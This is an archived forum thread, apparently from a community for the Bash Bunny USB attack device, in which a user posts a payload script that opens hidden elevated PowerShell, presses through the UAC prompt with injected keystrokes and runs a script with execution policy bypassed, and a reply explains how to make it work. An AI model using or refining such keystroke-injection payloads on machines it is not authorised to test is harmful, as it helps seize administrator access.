Jump to content

Bash Bunny language how to UAC..


Bergerjarl

Recommended Posts

Hi,

My case is want to run Powershell as admin but bunny language is not working on UAC.

Payload.txt file  look like bellow and my UAC setting is like the link i added the end of the post:

#!/bin/bash

# Options
LOOTDIR=/root/udisk/loot/badmin

######## INITIALIZATION ########
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE

######## MAKE LOOT DIRECTORY ########
mkdir -p $LOOTDIR

######## ATTACK ########
LED ATTACK
RUN WIN "powershell -windowstyle hidden start-process powershell -verb RunAs"
sleep 3
Q ALT Y
sleep 2
Q STRING "\$src = (gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\p.ps1'"
Q ENTER
sleep 1
QUACK STRING "powershell -ep bypass \$src"
Q ENTER
Q STRING "exit"
Q ENTER

######## FINISH ########
LED FINISH

------------------------------------------------------

My UAC setting is like described here (se the screenshoots in the article):

https://www.tenforums.com/tutorials/112476-enable-ctrl-alt-delete-secure-desktop-uac-prompt-windows.html

Link to comment
Share on other sites

Just UAC not working....

The UAC in the first window askd the my credential (I am admin, no need to enter my credential),  next windows asked CTRL + ALT + DEL to enter my credential and the third windows shows Run powershell as admin...

Do you know which commands i need?

 

 

Link to comment
Share on other sites

If the system language is German, then the shortcut letter is probably not "Y" as in English, but most likely "j" (for "Ja"), so "QUACK ALT j" should be used instead

Some other things:

- The "result" of GET SWITCH_POSITION isn't actually used in the payload, the switch position is instead hard coded in the script. Change that to use $SWITCH_POSITION to make the script more transparent and increase the chance that it will execute successfully despite what switch position the payload is stored in.

- Also mind the use/creation of the loot directory. The idea is most likely that this is supposed to be created on the udisk so that it is presented to the target as it is mounted when using ATTACKMODE STORAGE. However, that will not be the case here since the udisk is never mounted to the Bunny itself unless you actively do it manually from the Bunny side using "udisk mount" (the /root/udisk directory is just a "mount point" and should be empty unless nandf is mounted to that directory). So, that loot directory will not be created in a way that it will be presented/available to the target computer. If that is needed, I would most likely mount the udisk and create the directory and unmount the udisk before executing ATTACKMODE STORAGE (since the udisk ideally shouldn't be mounted to both the Bunny and the target at the same time). The payload most likely fails if set up as it is in its current state.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...